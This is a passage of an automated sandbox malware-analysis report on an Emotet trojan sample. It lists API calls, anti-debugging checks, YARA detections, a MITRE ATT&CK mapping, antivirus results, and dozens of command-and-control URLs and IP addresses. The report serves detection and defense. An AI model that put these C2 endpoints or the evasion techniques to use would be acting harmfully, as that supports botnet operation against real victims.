Source: svchost.exe, 00000005.00000002.373440622.00000241EBF40000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.419273377.000001BBD3940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.436429626.0000023111660000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.472258673.0000017DE8400000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000005.00000002.373440622.00000241EBF40000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.419273377.000001BBD3940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.436429626.0000023111660000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.472258673.0000017DE8400000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	API call chain: ExitProcess graph end node			graph_1-30587
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	API call chain: ExitProcess graph end node			graph_3-33387

Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Code function: 1_2_0041E5DF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

1_2_0041E5DF

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Code function: 1_2_00401D20 LoadLibraryW,GetProcAddress,

1_2_00401D20

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_022537AF mov eax, dword ptr fs:[00000030h]	1_2_022537AF
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_02252EC1 mov eax, dword ptr fs:[00000030h]	1_2_02252EC1
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_02241030 mov eax, dword ptr fs:[00000030h]	1_2_02241030
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_023037AF mov eax, dword ptr fs:[00000030h]	3_2_023037AF
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_02302EC1 mov eax, dword ptr fs:[00000030h]	3_2_02302EC1
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_022D095E mov eax, dword ptr fs:[00000030h]	3_2_022D095E
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_022D466F mov eax, dword ptr fs:[00000030h]	3_2_022D466F
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_022D4F5D mov eax, dword ptr fs:[00000030h]	3_2_022D4F5D
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_022D0456 mov eax, dword ptr fs:[00000030h]	3_2_022D0456
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_022E1030 mov eax, dword ptr fs:[00000030h]	3_2_022E1030

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Code function: 1_2_0041F4E5 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,

1_2_0041F4E5

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0042936B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0042936B
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0041E5DF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0041E5DF
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_004276D9 __decode_pointer,SetUnhandledExceptionFilter,	1_2_004276D9
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_004276B7 SetUnhandledExceptionFilter,__encode_pointer,	1_2_004276B7
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_00424D0A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00424D0A
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0042936B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0042936B
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0041E5DF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041E5DF
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_004276D9 __decode_pointer,SetUnhandledExceptionFilter,	3_2_004276D9
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_004276B7 SetUnhandledExceptionFilter,__encode_pointer,	3_2_004276B7
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_00424D0A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00424D0A

Source: dot3hc.exe, 00000003.00000002.614889926.0000000000E00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: dot3hc.exe, 00000003.00000002.614889926.0000000000E00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: dot3hc.exe, 00000003.00000002.614889926.0000000000E00000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: dot3hc.exe, 00000003.00000002.614889926.0000000000E00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Code function: 1_2_0042C347 cpuid

1_2_0042C347

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	1_2_00403F0B
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	1_2_004313E8
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: GetLocaleInfoA,	1_2_0042BDB0
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	3_2_00403F0B
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	3_2_004313E8
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: GetLocaleInfoA,	3_2_0042BDB0

Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Code function: 1_2_004273AA GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

1_2_004273AA

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Code function: 1_2_0042B089 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

1_2_0042B089

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Code function: 1_2_00404142 __EH_prolog3,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleFileNameA,GetVersion,RegOpenKeyExA,RegQueryValueExA,_sscanf,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,RegCloseKey,GetModuleHandleA,EnumResourceLanguagesA,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,_memset,

1_2_00404142

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 1.2.NWMEaRqF7s.exe.5a052e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.NWMEaRqF7s.exe.5a23ae.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.NWMEaRqF7s.exe.5a23ae.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.dot3hc.exe.22d052e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.dot3hc.exe.22d052e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.dot3hc.exe.22d23ae.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.dot3hc.exe.22d23ae.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.NWMEaRqF7s.exe.5a052e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API11	Path Interception	Process Injection2	Masquerading121	Input Capture1	System Time Discovery2	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel22	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery31	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol112	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing1	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	System Information Discovery46	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NWMEaRqF7s.exe	84%	Virustotal		Browse
NWMEaRqF7s.exe	68%	Metadefender		Browse
NWMEaRqF7s.exe	93%	ReversingLabs	Win32.Trojan.Emotet
NWMEaRqF7s.exe	100%	Avira	TR/Crypt.Agent.fbupz

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.dot3hc.exe.22d052e.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
1.2.NWMEaRqF7s.exe.2250000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.NWMEaRqF7s.exe.5a23ae.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.dot3hc.exe.22d23ae.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.dot3hc.exe.2300000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.NWMEaRqF7s.exe.5a052e.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://192.158.216.73/bw3A8vOSwPk/MUmkPxxvia/gp9rmo9BY/Aiyozum4do0I2sb158h/TZEWfRpLT/CpHNbkWtxKNiePn	0%	Avira URL Cloud	safe
https://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/	0%	Avira URL Cloud	safe
http://85.152.162.105/jIpQt16P2GWjQ5/wnzZKJ/DKZyC/	0%	Avira URL Cloud	safe
http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/T	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	Avira URL Cloud	safe
http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/	0%	Avira URL Cloud	safe
http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/	0%	Avira URL Cloud	safe
http://162.241.242.173:8080/nPONFQEvQO/m1R1pV6p0j201mdDM/V3kdX/	0%	Avira URL Cloud	safe
http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/t	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://192.158.216.73/bw3A8vOSwPk/MUmkPxxvia/gp9rmo9BY/Aiyozum4do0I2sb158h/TZEWfRpLT/CpHNbkWtxKNiePn	dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp	false		high
https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure	svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	svchost.exe, 00000012.00000002.616906100.0000017D2F6D0000.00000002.00000001.sdmp	false		high
http://85.152.162.105/jIpQt16P2GWjQ5/wnzZKJ/DKZyC/	dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://corp.roblox.com/contact/	svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp	false		high
http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/T	dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.roblox.com/develop	svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp	false		high
https://www.roblox.com/info/privacy	svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp	false		high
http://www.g5e.com/termsofservice	svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 0000000C.00000003.450618925.0000017DE7D9E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://en.help.roblox.com/hc/en-us	svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/parents/	svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp	false		high
http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/	dot3hc.exe, 00000003.00000002.617493690.00000000029F9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/	dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://162.241.242.173:8080/nPONFQEvQO/m1R1pV6p0j201mdDM/V3kdX/	dot3hc.exe, 00000003.00000002.617493690.00000000029F9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/t	dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
99.224.14.125	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	true
203.117.253.142	unknown	Singapore	9874	STARHUB-MOBILEStarHubLtdSG	true
94.200.114.161	unknown	United Arab Emirates	15802	DU-AS1AE	true
201.173.217.124	unknown	Mexico	11888	TelevisionInternacionalSAdeCVMX	true
139.99.158.11	unknown	Canada	16276	OVHFR	true
85.214.28.226	unknown	Germany	6724	STRATOSTRATOAGDE	true
85.152.162.105	unknown	Spain	12946	TELECABLESpainES	true
174.102.48.180	unknown	United States	10796	TWC-10796-MIDWESTUS	true
121.124.124.40	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
169.239.182.217	unknown	South Africa	37153	xneeloZA	true
47.144.21.12	unknown	United States	5650	FRONTIER-FRTRUS	true
98.109.204.230	unknown	United States	701	UUNETUS	true
139.59.60.244	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
61.19.246.238	unknown	Thailand	9335	CAT-CLOUD-APCATTelecomPublicCompanyLimitedTH	true
104.131.11.150	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
176.111.60.55	unknown	Ukraine	24703	UN-UKRAINE-ASKievUkraineUA	true
47.146.117.214	unknown	United States	5650	FRONTIER-FRTRUS	true
168.235.67.138	unknown	United States	3842	RAMNODEUS	true
137.59.187.107	unknown	Hong Kong	18106	VIEWQWEST-SG-APViewqwestPteLtdSG	true
94.23.237.171	unknown	France	16276	OVHFR	true
187.161.206.24	unknown	Mexico	11888	TelevisionInternacionalSAdeCVMX	true
139.162.108.71	unknown	Netherlands	63949	LINODE-APLinodeLLCUS	true
216.208.76.186	unknown	Canada	15321	GROUPE-MASKATEL-LPCA	true
200.41.121.90	unknown	Argentina	52444	PogliottiPogliottiConstruccionesSAAR	true
188.219.31.12	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
83.169.36.251	unknown	Germany	20773	GODADDYDE	true
5.196.74.210	unknown	France	16276	OVHFR	true
1.221.254.82	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
87.106.139.101	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
62.30.7.67	unknown	United Kingdom	5089	NTLGB	true
79.98.24.39	unknown	Lithuania	62282	RACKRAYUABRakrejusLT	true
74.208.45.104	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
192.158.216.73	unknown	United States	11776	ATLANTICBB-JOHNSTOWNUS	true
37.70.8.161	unknown	France	15557	LDCOMNETFR	true
50.81.3.113	unknown	United States	30036	MEDIACOM-ENTERPRISE-BUSINESSUS	true
107.5.122.110	unknown	United States	7922	COMCAST-7922US	true
89.205.113.80	unknown	Macedonia	41557	TELEKABEL-ASMK	true
84.39.182.7	unknown	Spain	15704	AS15704ES	true
70.121.172.89	unknown	United States	11427	TWC-11427-TEXASUS	true
173.81.218.65	unknown	United States	19108	SUDDENLINK-COMMUNICATIONSUS	true
75.139.38.211	unknown	United States	20115	CHARTER-20115US	true
97.82.79.83	unknown	United States	20115	CHARTER-20115US	true
67.205.85.243	unknown	Canada	32613	IWEB-ASCA	true
104.131.44.150	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
87.106.136.232	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
62.75.141.82	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
24.137.76.62	unknown	Canada	11260	EASTLINK-HSICA	true
172.91.208.86	unknown	United States	20001	TWC-20001-PACWESTUS	true
37.139.21.175	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
194.187.133.160	unknown	Bulgaria	13124	IBGCBG	true
173.62.217.22	unknown	United States	701	UUNETUS	true
112.185.64.233	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
24.43.99.75	unknown	United States	20001	TWC-20001-PACWESTUS	true
70.180.43.7	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
95.213.236.64	unknown	Russian Federation	49505	SELECTELRU	true
37.187.72.193	unknown	France	16276	OVHFR	true
46.105.131.79	unknown	France	16276	OVHFR	true
139.130.242.43	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
110.145.77.103	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
120.150.60.189	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
190.160.53.126	unknown	Chile	22047	VTRBANDAANCHASACL	true
95.179.229.244	unknown	Netherlands	20473	AS-CHOOPAUS	true
85.66.181.138	unknown	Hungary	20845	DIGICABLEHU	true
93.147.212.206	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
109.74.5.95	unknown	Sweden	43948	GLESYS-ASSE	true
180.92.239.110	unknown	Bangladesh	9832	ISN-AS-APISNInternetServiceProviderBD	true
91.211.88.52	unknown	Ukraine	206638	HOSTFORYUA	true
153.232.188.106	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	true
142.44.137.67	unknown	Canada	16276	OVHFR	true
79.137.83.50	unknown	France	16276	OVHFR	true
103.86.49.11	unknown	Thailand	58955	BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTH	true
209.141.54.221	unknown	United States	53667	PONYNETUS	true
157.245.99.39	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
190.55.181.54	unknown	Argentina	27747	TelecentroSAAR	true
203.153.216.189	unknown	Indonesia	45291	SURF-IDPTSurfindoNetworkID	true
185.94.252.104	unknown	Germany	197890	MEGASERVERS-DE	true
5.39.91.110	unknown	France	16276	OVHFR	true
174.45.13.118	unknown	United States	33588	BRESNAN-33588US	true
137.119.36.33	unknown	United States	11426	TWC-11426-CAROLINASUS	true
104.236.246.93	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
162.241.242.173	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
189.212.199.126	unknown	Mexico	6503	AxtelSABdeCVMX	true
74.120.55.163	unknown	Canada	32315	WJBTN-ASCA	true
85.105.205.77	unknown	Turkey	9121	TTNETTR	true
200.114.213.233	unknown	Argentina	10318	TelecomArgentinaSAAR	true
78.24.219.147	unknown	Russian Federation	29182	THEFIRST-ASRU	true
24.179.13.119	unknown	United States	20115	CHARTER-20115US	true

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	445260
Start date:	07.07.2021
Start time:	14:26:50
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	NWMEaRqF7s.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@8/4@0/88
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 31.3% (good quality ratio 30.9%) Quality average: 82.8% Quality standard deviation: 21.8%
HCA Information:	Successful, ratio: 77% Number of executed functions: 90 Number of non-executed functions: 208
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 23.35.237.194, 92.122.145.220, 40.88.32.150, 52.255.188.83, 20.82.210.154, 20.54.104.15, 40.112.88.60, 23.216.77.208, 23.216.77.209, 23.35.236.56, 20.50.102.62 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:28:35	API Interceptor	12x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
